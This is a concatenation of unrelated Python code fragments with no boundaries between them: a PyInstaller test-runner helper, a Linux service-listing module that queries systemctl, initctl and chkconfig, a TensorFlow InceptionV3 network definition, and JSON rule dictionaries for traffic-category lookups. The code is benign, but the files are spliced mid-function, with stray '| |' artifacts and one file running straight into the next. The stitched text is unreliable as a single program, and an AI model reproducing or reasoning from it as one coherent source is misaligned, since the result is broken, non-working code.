encoded file with the correct '# -*- coding: utf-8 -*-' marker.
"""
__tracebackhide__ = True
# For parametrized test append the test-id.
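# kwargs.setdefault('test_id') returns None when no id was supplied and guarantees the key
# exists, so it can be deleted before kwargs is forwarded to test_script().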
scriptfile = gen_sourcefile(self._tmpdir, source,
kwargs.setdefault('test_id'))
del kwargs['test_id']
return self.test_script(str(scriptfile), *args, **kwargs)
def test_script(self, script, pyi_args=None, app_name=None,
app_args=None, runtime=None, run_from_path=False,
**kwargs):
"""
Main method to wrap all phases of testing a Python script.
:param script: Name of script to create executable from.
:param pyi_args: Additional arguments to pass to PyInstaller when creating executable.
:param app_name: Name of the executable. This is equivalent to argument --name=APPNAME.
:param app_args: Additional arguments to pass to the created executable.
:param runtime: Time in seconds how long to keep executable running.
:param toc_log: List of modules that are expected to be bundled with the executable.
"""
__tracebackhide__ = True
def marker(line):
# Print some marker to stdout and stderr to make it easier
# to distinguish the phases in the CI test output.
print('-------', line, '-------')
print('-------', line, '-------', file=sys.stderr)
if pyi_args is None:
pyi_args = []
if app_args is None:
app_args = []
if app_name:
pyi_args.extend(['--name', app_name])
else:
# Derive name from script name.
app_name = os.path.splitext(os.path.basename(script))[0]
# Relative path means that a script from _script_dir is referenced.
if not os.path.isabs(script):
script = os.path.join(_get_script_dir(self._request), script)
self.script = script
assert os.path.exists(self.script), 'Script %s not found.' % script
marker('Starting build.')
if not self._test_building(args=pyi_args):
pytest.fail('Building of %s failed.' % script)
marker('Build finished, now running executable.')
self._test_executables(app_name, args=app_args,
runtime=runtime, run_from_path=run_from_path,
**kwargs)
marker('Running executable finished.')
def _test_executables(self, name, args, runtime, run_from_path, **kwargs):
"""
Run created executable to make sure it works.
Multipackage-tests generate more than one exe-file and all of
them have to be run.
:param args: CLI options to pass to the created executable.
:param runtime: Time in seconds how long to keep the executable running.
:return: Exit code of the executable.
"""
__tracebackhide__ = True
exes = self._find_executables(name)
# Empty list means that PyInstaller probably failed to create any executable.
assert exes != [], 'No executable file was found.'
for exe in exes:
# Try to find .toc log file. .toc log file has the same basename as exe file.
toc_log = os.path.join(
_get_logs_dir(self._request),
os.path.splitext(os.path.basename(exe))[0] + '.toc')
if os.path.exists(toc_log):
if not self._examine_executable(exe, toc_log):
pytest.fail('Matching .toc of %s failed.' % exe)
retcode = self._run_executable(exe, args, run_from_path, runtime)
if retcode != kwargs.get('retcode', 0):
pytest.fail('Running exe %s failed with return-code %s.' %
(exe, retcode))
def _find_executables(self, name):
"""
Search for all executables generated by the testcase.
If the test-case is called e.g. 'test_multipackage1', this
searches for each of 'test_multipackage1.exe' and
'multipackage1_?.exe' in both one-file and one-dir mode.
:param name: Name of the executable to look for.
:return: List of executables
"""
exes = []
onedir_pt = os.path.join(self._distdir, name, name)
onefile_pt = os.path.join(self._distdir, name)
patterns = [onedir_pt, onefile_pt,
# Multipackage one-dir
onedir_pt + '_?',
# Multipackage one-file
onefile_pt + '_?']
# For Windows append .exe extension to patterns.
if is_win:
patterns = [pt + '.exe' for pt in patterns]
# For Mac OS X append pattern for .app bundles.
if is_darwin:
# e.g: ./dist/name.app/Contents/MacOS/name
pt = os.path.join(self._distdir, name + '.app', 'Contents', 'MacOS', name)
patterns.append(pt)
# Apply file patterns.
for pattern in patterns:
for prog in glob.glob(pattern):
if os.path.isfile(prog):
exes.append(prog)
return exes
def _run_executable(self, prog, args, run_from_path, runtime):
"""
Run executable created by PyInstaller.
:param args: CLI options to pass to the created executable.
"""
# Run the test in a clean environment to make sure they're | |
= -1
else:
temp = GetUpstartEnabled(sc)
if temp is False:
Enabled = False
else:
# When GetUpstartEnabled returns "Complex", we assume that it
# is enabled (and we won't modify it).
Enabled = True
State = GetUpstartState(sc)
Path = "/etc/init/" + sc.Name + ".conf"
elif sc.Controller == "init":
if not ServiceExistsInInit(sc):
Print("Error: Unable to find service named " +
sc.Name + " in init.", file=sys.stderr)
LG().Log(
'ERROR', "Error: Unable to find service named " +
sc.Name + " in init.")
exit_code = -1
else:
Enabled = GetInitEnabled(sc)
State = GetInitState(sc)
Path = "/etc/init.d/" + sc.Name
GetOne(sc)
return [exit_code, Name, Controller, Enabled, State, Path, sc.Description, sc.Runlevels]
def GetOne(sc):
GetAll(sc)
if len(sc.services_list):
sc.Description = sc.services_list[0]['Description']
sc.Runlevels = sc.services_list[0]['Runlevels']
def GetAll(sc):
if sc.Controller == 'init':
return InitdGetAll(sc)
if sc.Controller == 'systemd':
return SystemdGetAll(sc)
if sc.Controller == 'upstart':
return UpstartGetAll(sc)
def GetRunlevels(sc, Name):
if sc.runlevels_d == None:
sc.runlevels_d = {}
cmd = "file /etc/rc*.d/* | grep link | awk '{print $5,$1}' | sort"
code, out = RunGetOutput(cmd, False, False)
for line in out.splitlines():
line = line.replace("'", '')
srv = line.split(' ')[0]
rl = line.split(' ')[1]
n = os.path.basename(srv)
if n not in sc.runlevels_d.keys():
sc.runlevels_d[n] = {}
if 'Path' not in sc.runlevels_d[n].keys():
sc.runlevels_d[n]['Path'] = srv.replace('..', '/etc')
if 'Runlevels' not in sc.runlevels_d[n].keys():
sc.runlevels_d[n]['Runlevels'] = ''
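# rl is a path such as '/etc/rc2.d/S01ssh': index 7 holds the runlevel digit and index 11 is 'S' (started at that runlevel) or 'K' (killed).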
s = 'off'
if rl[11].lower() == 's':
s = 'on'
sc.runlevels_d[n]['Runlevels'] += rl[7] + ':' + s + ' '
if Name in sc.runlevels_d.keys():
return sc.runlevels_d[Name]
return None
def SystemdGetAll(sc):
d = {}
if os.system('which systemctl') != 0:
Print("Error: 'Controller' = " + sc.Controller +
" is incorrectly specified.", file=sys.stderr)
LG().Log('ERROR', "Error: 'Controller' = " +
sc.Controller + " is incorrectly specified.")
return False
Name = sc.Name
if '*' not in Name and '?' not in Name and len(Name) > 0:
Name = Name.replace('.service', '')
Name += '.service'
# Do the commands work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the commands.
# RunGetOutput(chk_err = True) will log the error message here if it
# occurs.
cmd = 'systemctl -a list-unit-files ' + Name
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0: # Serious problem, return False
return False
sname = ''
# Get the last service name from the output.
m = re.search(r'.*?\n(.*?)[.]service.*?\n', txt, re.M)
if m is None: # The result is empty, return True.
return True
sname = m.group(1)
cmd = 'systemctl -a --no-pager --no-legend -p "Names,WantedBy,Description,SubState,FragmentPath,UnitFileState" show ' + sname
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = 'systemctl -a list-unit-files ' + Name + '| grep \.service | grep -v "@" | awk \'{print $1}\' | xargs systemctl -a --no-pager --no-legend -p "Names,WantedBy,Description,SubState,FragmentPath,UnitFileState" show'
code, txt = RunGetOutputNoStderr(cmd, False, False)
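# 'systemctl show' emits one 'Key=Value' block per unit, with blocks separated by a blank line;
# collapse blocks into '@@'-separated records and properties into '|'-separated fields for splitting below.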
txt=txt.replace('\n\n','@@')
txt=txt.replace('\n','|')
services=txt.split('@@')
subs=re.compile(r'(.*?=)')
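# subs strips the leading 'Key=' from each 'Key=Value' property.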
for srv in services:
if len(srv) == 0:
continue
s=srv.split('|')
d['Name'] = subs.sub('',s[0].replace('.service',''))
d['Controller'] = sc.Controller
d['Description'] =subs.sub('',s[2])
d['State'] = subs.sub('',s[3])
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = subs.sub('',s[4])
d['Enabled'] = 'enabled' in subs.sub('',s[5])
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
rld=GetRunlevels(sc,d['Name'])
if rld != None and 'Runlevels' in rld.keys():
d['Runlevels'] = rld['Runlevels']
else:
d['Runlevels'] = subs.sub('',s[1])
sc.services_list.append(copy.deepcopy(d))
return True
def UpstartGetAll(sc):
d={}
names={}
if os.system('which initctl') != 0:
Print("Error: 'Controller' = " + sc.Controller + " is incorrectly specified.", file=sys.stderr)
LG().Log('ERROR', "Error: 'Controller' = " + sc.Controller + " is incorrectly specified.")
return False
# Do the commands work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the commands.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = 'initctl list'
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
cmd = initd_service + ' --status-all'
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
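# A typical 'initctl list' line looks like 'ssh start/running, process 1234'; after the sed/tr/awk pipeline only the job name and its goal/state field remain.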
cmd = "initctl list | sed 's/[(].*[)] //g' | tr ', ' ' ' | awk '{print $1,$2}'"
code, txt = RunGetOutputNoStderr(cmd, False, False)
services = txt.splitlines()
cmd = initd_service + " --status-all &> /tmp/tmpfile ; cat /tmp/tmpfile ; rm /tmp/tmpfile"
code, txt = RunGetOutputNoStderr(cmd, False, False)
txt = txt.replace('[','')
txt = txt.replace(']','')
services.extend(txt.splitlines())
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
if len(s[0]) == 1: #swap them.
s.reverse()
d['Name'] = s[0]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
if d['Name'] in names.keys():
continue
names[d['Name']] = None
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
if 'running' in s[1] or '+' in s[1]:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[0]):
d['Path'] = '/etc/init.d/' + s[0]
elif os.path.exists('/etc/init/' + s[0] + '.conf'):
d['Path'] = '/etc/init/' + s[0] + '.conf'
# 'initctl list' won't show disabled services
d['Enabled'] = True
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
if len(s[1]) > 1:
cmd = 'initctl show-config ' + d['Name'] + ' | grep -E "start |stop " | tr "\n" " " | tr -s " " '
code, out = RunGetOutputNoStderr(cmd, False, False)
d['Runlevels'] = out[1:]
else:
rld=GetRunlevels(sc,d['Name'])
if rld != None and 'Runlevels' in rld.keys():
d['Runlevels'] = rld['Runlevels']
sc.services_list.append(copy.deepcopy(d))
return True
def InitdGetAll(sc):
d={}
if helperlib.CONFIG_SYSCONFDIR_DSC == "omsconfig":
initd_service_status = 'sudo /opt/microsoft/omsconfig/Scripts/OMSServiceStat.sh'
status_postfix = ''
initd_service_status_all = 'sudo /opt/microsoft/omsconfig/Scripts/OMSServiceStatAll.sh'
else:
initd_service_status = initd_service
status_postfix = ' status'
initd_service_status_all = initd_service + ' --status-all '
if os.path.exists(initd_chkconfig):
# SLES 11-SP4 chkconfig can return error code on success,
# so don't check chkconfig error code if this is the case.
if os.path.exists('/etc/SuSE-release'):
txt = open('/etc/SuSE-release','r').read()
s=r'.*?VERSION.*?=(.*?)\n.*?PATCHLEVEL.*?=(.*?)\n'
m = re.search(s, txt, re.M)
if m != None:
if not (int(m.group(1)) == 11 and int(m.group(2)) == 4 ) :
# Does the command work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the command.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = initd_chkconfig + ' --list '
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = initd_chkconfig + ' --list | grep on | grep -v based'
code, txt = RunGetOutputNoStderr(cmd, False, False)
services=txt.splitlines()
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
d['Name'] = s[0]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
cmd = initd_service_status + ' ' + s[0] + status_postfix
code, txt = RunGetOutputNoStderr(cmd, False, False)
if 'running' in txt:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[0]):
d['Path'] = '/etc/init.d/' + s[0]
d['Enabled'] = ':on' in srv
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
d['Runlevels'] = reduce(lambda x, y: x + ' ' + y, s[1:])
sc.services_list.append(copy.deepcopy(d))
else:
# Does the command work?
# There may be no error detected in our multi-statement command below.
# To keep from returning garbage, we must test the command.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = initd_service_status_all
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = initd_service_status_all + ' &> /tmp/tmpfile ; cat /tmp/tmpfile ; rm /tmp/tmpfile'
code, txt = RunGetOutputNoStderr(cmd, False, False)
txt = txt.replace('[','')
txt = txt.replace(']','')
services = txt.splitlines()
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
d['Name'] = s[1]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
if '+' in s[0]:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[1]):
d['Path'] = '/etc/init.d/' + s[1]
elif os.path.exists('/etc/init/' + s[1] + '.conf'):
d['Path'] = '/etc/init/' + s[1] + '.conf'
import tensorflow as tf
from modeler.tfmodel import TFModel
class InceptionNetModel(TFModel):
def __init__(self):
self.slim = tf.contrib.slim
self.trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
pass
def add_placeholder(self):
batch_size = 32
height, width = 299, 299
self.inputs = tf.random_uniform((batch_size, height, width, 3))
pass
def build(self):
with self.slim.arg_scope(self.inception_v3_arg_scope()):
self.logits, self.end_points = self.inception_v3(self.inputs, is_training=False)
pass
def inception_v3_base(self,inputs, scope=None):
end_points = {}
with tf.variable_scope(scope, 'InceptionV3', [inputs]):
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='VALID'):
# 299 x 299 x 3
net = self.slim.conv2d(inputs, 32, [3, 3], stride=2, scope='Conv2d_1a_3x3')
# 149 x 149 x 32
net = self.slim.conv2d(net, 32, [3, 3], scope='Conv2d_2a_3x3')
# 147 x 147 x 32
net = self.slim.conv2d(net, 64, [3, 3], padding='SAME', scope='Conv2d_2b_3x3')
# 147 x 147 x 64
net = self.slim.max_pool2d(net, [3, 3], stride=2, scope='MaxPool_3a_3x3')
# 73 x 73 x 64
net = self.slim.conv2d(net, 80, [1, 1], scope='Conv2d_3b_1x1')
# 73 x 73 x 80.
net = self.slim.conv2d(net, 192, [3, 3], scope='Conv2d_4a_3x3')
# 71 x 71 x 192.
net = self.slim.max_pool2d(net, [3, 3], stride=2, scope='MaxPool_5a_3x3')
# 35 x 35 x 192.
# Inception blocks
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='SAME'):
# mixed: 35 x 35 x 256.
with tf.variable_scope('Mixed_5b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv2d_0b_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 32, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_1: 35 x 35 x 288.
with tf.variable_scope('Mixed_5c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0b_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv_1_0c_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 64, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_2: 35 x 35 x 288.
with tf.variable_scope('Mixed_5d'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv2d_0b_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 64, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_3: 17 x 17 x 768.
with tf.variable_scope('Mixed_6a'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 384, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_1 = self.slim.conv2d(branch_1, 96, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_1x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.max_pool2d(net, [3, 3], stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], 3)
# mixed4: 17 x 17 x 768.
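# The branches below use factorized 7x7 convolutions (a 1x7 followed by a 7x1), which cover the same receptive field as a single 7x7 kernel with fewer parameters.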
with tf.variable_scope('Mixed_6b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 128, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 128, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 128, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 128, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 128, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 128, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_5: 17 x 17 x 768.
with tf.variable_scope('Mixed_6c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 160, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 160, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_6: 17 x 17 x 768.
with tf.variable_scope('Mixed_6d'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 160, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 160, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_7: 17 x 17 x 768.
with tf.variable_scope('Mixed_6e'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 192, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 192, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 192, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points['Mixed_6e'] = net
# mixed_8: 8 x 8 x 1280.
with tf.variable_scope('Mixed_7a'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_0 = self.slim.conv2d(branch_0, 320, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 192, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
branch_1 = self.slim.conv2d(branch_1, 192, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.max_pool2d(net, [3, 3], stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], 3)
# mixed_9: 8 x 8 x 2048.
with tf.variable_scope('Mixed_7b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 320, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 384, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = tf.concat([
self.slim.conv2d(branch_1, 384, [1, 3], scope='Conv2d_0b_1x3'),
self.slim.conv2d(branch_1, 384, [3, 1], scope='Conv2d_0b_3x1')], 3)
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 448, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(
branch_2, 384, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = tf.concat([
self.slim.conv2d(branch_2, 384, [1, 3], scope='Conv2d_0c_1x3'),
self.slim.conv2d(branch_2, 384, [3, 1], scope='Conv2d_0d_3x1')], 3)
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(
branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_10: 8 x 8 x 2048.
with tf.variable_scope('Mixed_7c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 320, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 384, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = tf.concat([
self.slim.conv2d(branch_1, 384, [1, 3], scope='Conv2d_0b_1x3'),
self.slim.conv2d(branch_1, 384, [3, 1], scope='Conv2d_0c_3x1')], 3)
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 448, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(
branch_2, 384, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = tf.concat([
self.slim.conv2d(branch_2, 384, [1, 3], scope='Conv2d_0c_1x3'),
self.slim.conv2d(branch_2, 384, [3, 1], scope='Conv2d_0d_3x1')], 3)
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(
branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
return net, end_points
def inception_v3(self,inputs,
num_classes=1000,
is_training=True,
dropout_keep_prob=0.8,
prediction_fn=tf.contrib.slim.softmax,
spatial_squeeze=True,
reuse=None,
scope='InceptionV3'):
with tf.variable_scope(scope, 'InceptionV3', [inputs, num_classes],
reuse=reuse) as scope:
with self.slim.arg_scope([self.slim.batch_norm, self.slim.dropout],
is_training=is_training):
net, end_points = self.inception_v3_base(inputs, scope=scope)
# Auxiliary Head logits
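# The auxiliary classifier attached to Mixed_6e provides an extra gradient signal and acts as a regularizer during training; it is ignored at inference time.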
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='SAME'):
aux_logits = end_points['Mixed_6e']
with tf.variable_scope('AuxLogits'):
aux_logits = self.slim.avg_pool2d(
aux_logits, [5, 5], stride=3, padding='VALID',
scope='AvgPool_1a_5x5')
aux_logits = self.slim.conv2d(aux_logits, 128, [1, 1],
scope='Conv2d_1b_1x1')
# Shape of feature map before the final layer.
aux_logits = self.slim.conv2d(
aux_logits, 768, [5, 5],
weights_initializer=self.trunc_normal(0.01),
padding='VALID', scope='Conv2d_2a_5x5')
aux_logits = self.slim.conv2d(
aux_logits, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, weights_initializer=self.trunc_normal(0.001),
scope='Conv2d_2b_1x1')
if spatial_squeeze:
aux_logits = tf.squeeze(aux_logits, [1, 2], name='SpatialSqueeze')
end_points['AuxLogits'] = aux_logits
# Final pooling and prediction
with tf.variable_scope('Logits'):
net = self.slim.avg_pool2d(net, [8, 8], padding='VALID',
scope='AvgPool_1a_8x8')
# 1 x 1 x 2048
net = self.slim.dropout(net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
end_points['PreLogits'] = net
# 2048
logits = self.slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, scope='Conv2d_1c_1x1')
if spatial_squeeze:
logits = tf.squeeze(logits, [1, 2], name='SpatialSqueeze')
},
"operation":"CREATE"
}
json_rule_all_traffic = {
"name":"All Traffic",
"action":"allow",
"mode":"edit",
"actionOptions":{
"ssl":"",
"serviceChain":""
},
"isDefault":True
}
json_rule_category_lookup_all = {
"type":"Category Lookup",
"options":{
"category":[],
"url":[]
}
}
json_rule_category_lookup_connect = {
"type":"HTTP Connect Category Lookup",
"options":{
"category":[],
"url":[]
}
}
json_rule_category_lookup_sni = {
"type":"SNI Category Lookup",
"options":{
"category":[],
"url":[]
}
}
